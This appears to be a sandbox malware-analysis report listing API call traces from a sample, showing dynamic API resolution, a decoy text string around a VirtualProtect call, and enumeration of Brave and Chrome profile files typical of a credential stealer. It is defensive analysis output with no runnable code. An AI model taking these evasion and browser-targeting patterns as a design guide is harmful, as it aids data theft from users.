GetProcAddress.KERNEL32(75900000,026D6C40), ref: 004196D8
GetProcAddress.KERNEL32(75900000,026D6BE0), ref: 004196F0
GetProcAddress.KERNEL32(75900000,026B58E8), ref: 00419709
GetProcAddress.KERNEL32(75900000,026B5848), ref: 00419721
GetProcAddress.KERNEL32(75900000,026B5B48), ref: 00419739
GetProcAddress.KERNEL32(75900000,026B5AA8), ref: 00419752
GetProcAddress.KERNEL32(75900000,026D8DE8), ref: 0041976A
GetProcAddress.KERNEL32(75900000,026D8E48), ref: 00419782
GetProcAddress.KERNEL32(75900000,026B9370), ref: 0041979B
GetProcAddress.KERNEL32(75900000,026B5BC8), ref: 004197B3
GetProcAddress.KERNEL32(75900000,026D8E60), ref: 004197CB
GetProcAddress.KERNEL32(75900000,026D8E18), ref: 004197E4
GetProcAddress.KERNEL32(75900000,026D8E78), ref: 004197FC
GetProcAddress.KERNEL32(75900000,026D8DD0), ref: 00419814
GetProcAddress.KERNEL32(75900000,026B5A48), ref: 0041982D
GetProcAddress.KERNEL32(75900000,026D8E90), ref: 00419845
GetProcAddress.KERNEL32(75900000,026D8E00), ref: 0041985D
GetProcAddress.KERNEL32(75900000,026D8E30), ref: 00419876
GetProcAddress.KERNEL32(75900000,026D8B00), ref: 0041988E
GetProcAddress.KERNEL32(75900000,026D8C68), ref: 004198A6
GetProcAddress.KERNEL32(75900000,026D8CC8), ref: 004198BF
GetProcAddress.KERNEL32(75900000,026D8C50), ref: 004198D7
GetProcAddress.KERNEL32(75900000,026D8BD8), ref: 004198EF
GetProcAddress.KERNEL32(75900000,026D8C80), ref: 00419908
GetProcAddress.KERNEL32(75900000,026B88C8), ref: 00419920
GetProcAddress.KERNEL32(75900000,026D8BF0), ref: 00419938
GetProcAddress.KERNEL32(75900000,026D8B48), ref: 00419951
GetProcAddress.KERNEL32(75900000,026B5968), ref: 00419969
GetProcAddress.KERNEL32(75900000,026D8BA8), ref: 00419981
GetProcAddress.KERNEL32(75900000,026B5AC8), ref: 0041999A
GetProcAddress.KERNEL32(75900000,026D8B30), ref: 004199B2
GetProcAddress.KERNEL32(75900000,026D8D70), ref: 004199CA
GetProcAddress.KERNEL32(75900000,026B5C08), ref: 004199E3
GetProcAddress.KERNEL32(75900000,026B5C88), ref: 004199FB
LoadLibraryA.KERNEL32(026D8D10,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A0D
LoadLibraryA.KERNEL32(026D8C08,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A1E
LoadLibraryA.KERNEL32(026D8CF8,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A30
LoadLibraryA.KERNEL32(026D8D88,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A42
LoadLibraryA.KERNEL32(026D8BC0,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A53
LoadLibraryA.KERNEL32(026D8B90,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A65
LoadLibraryA.KERNEL32(026D8CB0,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A77
LoadLibraryA.KERNEL32(026D8D28,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A88
GetProcAddress.KERNEL32(75FD0000,026B5D48), ref: 00419AAA
GetProcAddress.KERNEL32(75FD0000,026D8B18), ref: 00419AC2
GetProcAddress.KERNEL32(75FD0000,026BBE38), ref: 00419ADA
GetProcAddress.KERNEL32(75FD0000,026D8C20), ref: 00419AF3
GetProcAddress.KERNEL32(75FD0000,026B5CA8), ref: 00419B0B
GetProcAddress.KERNEL32(734B0000,026B9208), ref: 00419B30
GetProcAddress.KERNEL32(734B0000,026B5E08), ref: 00419B49
GetProcAddress.KERNEL32(734B0000,026B9230), ref: 00419B61
GetProcAddress.KERNEL32(734B0000,026D8AD0), ref: 00419B79
GetProcAddress.KERNEL32(734B0000,026D8CE0), ref: 00419B92
GetProcAddress.KERNEL32(734B0000,026B5CC8), ref: 00419BAA
GetProcAddress.KERNEL32(734B0000,026B5E48), ref: 00419BC2
GetProcAddress.KERNEL32(734B0000,026D8D40), ref: 00419BDB
GetProcAddress.KERNEL32(763B0000,026B5F08), ref: 00419BFC
GetProcAddress.KERNEL32(763B0000,026B5CE8), ref: 00419C14
GetProcAddress.KERNEL32(763B0000,026D8B78), ref: 00419C2D
GetProcAddress.KERNEL32(763B0000,026D8B60), ref: 00419C45
GetProcAddress.KERNEL32(763B0000,026B5F28), ref: 00419C5D
GetProcAddress.KERNEL32(750F0000,026B9488), ref: 00419C83
GetProcAddress.KERNEL32(750F0000,026B9258), ref: 00419C9B
GetProcAddress.KERNEL32(750F0000,026D8C38), ref: 00419CB3
GetProcAddress.KERNEL32(750F0000,026B5FA8), ref: 00419CCC
GetProcAddress.KERNEL32(750F0000,026B5FC8), ref: 00419CE4
GetProcAddress.KERNEL32(750F0000,026B9280), ref: 00419CFC
GetProcAddress.KERNEL32(75A50000,026D8C98), ref: 00419D22
GetProcAddress.KERNEL32(75A50000,026B5C68), ref: 00419D3A
GetProcAddress.KERNEL32(75A50000,026BBC48), ref: 00419D52
GetProcAddress.KERNEL32(75A50000,026D8D58), ref: 00419D6B
GetProcAddress.KERNEL32(75A50000,026D8AE8), ref: 00419D83
GetProcAddress.KERNEL32(75A50000,026B5C48), ref: 00419D9B
GetProcAddress.KERNEL32(75A50000,026B5F88), ref: 00419DB4
GetProcAddress.KERNEL32(75A50000,026D8DA0), ref: 00419DCC
GetProcAddress.KERNEL32(75A50000,026D8DB8), ref: 00419DE4
GetProcAddress.KERNEL32(75070000,026B5D08), ref: 00419E06
GetProcAddress.KERNEL32(75070000,026D9400), ref: 00419E1E
GetProcAddress.KERNEL32(75070000,026D9268), ref: 00419E36
GetProcAddress.KERNEL32(75070000,026D9430), ref: 00419E4F
GetProcAddress.KERNEL32(75070000,026D9250), ref: 00419E67
GetProcAddress.KERNEL32(74E50000,026B5D28), ref: 00419E88
GetProcAddress.KERNEL32(74E50000,026B5FE8), ref: 00419EA1
GetProcAddress.KERNEL32(75320000,026B5D68), ref: 00419EC2
GetProcAddress.KERNEL32(75320000,026D9280), ref: 00419EDA
GetProcAddress.KERNEL32(6F080000,026B5EA8), ref: 00419F00
GetProcAddress.KERNEL32(6F080000,026B5DE8), ref: 00419F18
GetProcAddress.KERNEL32(6F080000,026B5F68), ref: 00419F30
GetProcAddress.KERNEL32(6F080000,026D94A8), ref: 00419F49
GetProcAddress.KERNEL32(6F080000,026B5E28), ref: 00419F61
GetProcAddress.KERNEL32(6F080000,026B5E68), ref: 00419F79
GetProcAddress.KERNEL32(6F080000,026B5D88), ref: 00419F92
GetProcAddress.KERNEL32(6F080000,026B5DA8), ref: 00419FAA
GetProcAddress.KERNEL32(6F080000,InternetSetOptionA), ref: 00419FC1
GetProcAddress.KERNEL32(6F080000,HttpQueryInfoA), ref: 00419FD7
GetProcAddress.KERNEL32(74E00000,026D93A0), ref: 00419FF9
GetProcAddress.KERNEL32(74E00000,026BBC58), ref: 0041A011
GetProcAddress.KERNEL32(74E00000,026D92C8), ref: 0041A029
GetProcAddress.KERNEL32(74E00000,026D9298), ref: 0041A042
GetProcAddress.KERNEL32(74DF0000,026B5E88), ref: 0041A063
GetProcAddress.KERNEL32(6E3A0000,026D9358), ref: 0041A084
GetProcAddress.KERNEL32(6E3A0000,026B5EC8), ref: 0041A09D
GetProcAddress.KERNEL32(6E3A0000,026D9328), ref: 0041A0B5
GetProcAddress.KERNEL32(6E3A0000,026D9238), ref: 0041A0CD

Strings

HttpQueryInfoA, xrefs: 00419FCC
InternetSetOptionA, xrefs: 00419FB5

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
Instruction ID: de404ee9f47513f53d28e8016dc56f999ad60f1515a6c9981bc8237813ea7153
Opcode Fuzzy Hash: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
Instruction Fuzzy Hash: 946243B5500E00AFC774DFA8EE88D1E3BABBB8C761750A51AE609C3674D7349443DBA4

Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404648
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,0041649B), ref: 00404657
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,0041649B), ref: 0040465E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040466C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404677
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404682
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040468D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404698
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046AC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046B7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046CD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046D8
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
strlen.MSVCRT ref: 00404740
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
Instruction ID: 04d817b79848fc48b59ba69504da24c7d1b3191c531f4b94b2025844f93bc58f
Opcode Fuzzy Hash: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
Instruction Fuzzy Hash: E941BB79740624EBC71C9FE5EC89B987F71AB4C712BA0C062F90299190C7F9D5019B3D

Function 0040BCB0 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindFirstFileA.KERNEL32(00000000,?,00420B17,00420B16,00000000,?,?,?,00421398,00420B0F), ref: 0040BD35
StrCmpCA.SHLWAPI(?,0042139C), ref: 0040BD8D
StrCmpCA.SHLWAPI(?,004213A0), ref: 0040BDA3
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040C5FF
FindClose.KERNEL32(000000FF), ref: 0040C611

Strings

Brave, xrefs: 0040BF42
Preferences, xrefs: 0040BF5E
\Brave\Preferences, xrefs: 0040C01B
Google Chrome, xrefs: 0040C474

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 81b0c4c5a40363ee5b414142f32e13999a6f1c2e6cf2ba4c607223b9b3e2fc1f
Instruction ID: 367325ed2970f14afd5354ed5b858d96e390655a4ce51a4c817116a6e2d4185c
Opcode Fuzzy Hash: 81b0c4c5a40363ee5b414142f32e13999a6f1c2e6cf2ba4c607223b9b3e2fc1f
